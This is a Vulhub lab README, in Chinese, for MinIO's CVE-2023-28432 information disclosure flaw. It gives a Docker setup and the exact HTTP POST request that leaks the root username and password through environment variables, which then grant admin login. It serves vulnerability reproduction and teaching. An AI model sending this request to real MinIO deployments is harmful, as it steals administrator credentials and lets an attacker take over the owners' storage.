Files
vulhub/minio/CVE-2023-28432/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
first commit
2025-09-06 16:08:15 +08:00

46 lines
1.4 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# MinIO集群模式信息泄露漏洞CVE-2023-28432
MinIO是一个开源对象存储系统。
在其`RELEASE.2023-03-20T20-16-18Z`版本不含以前集群模式部署下存在一处信息泄露漏洞攻击者可以通过发送一个POST数据包获取进程所有的环境变量其中就包含账号密码`MINIO_ROOT_USER``MINIO_ROOT_PASSWORD`
参考链接:
- <https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q>
- <https://mp.weixin.qq.com/s/GNhQLuzD8up3VcBRIinmgQ>
## 漏洞环境
执行如下命令启动一个MinIO集群其中包含3个以集群模式运行的服务
```
docker compose up -d
```
集群启动后,访问`http://your-ip:9001`可以查看Web管理页面访问`http://your-ip:9000`是API服务。
## 漏洞复现
这个漏洞存在于API节点`http://your-ip:9000/minio/bootstrap/v1/verify`上,发送如下数据包即可查看泄露的环境变量:
```
POST /minio/bootstrap/v1/verify HTTP/1.1
Host: your-ip:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```
![](1.png)
可见,其中包含`MINIO_ROOT_USER``MINIO_ROOT_PASSWORD`。使用这个账号密码,即可成功登录管理后台:
![](2.png)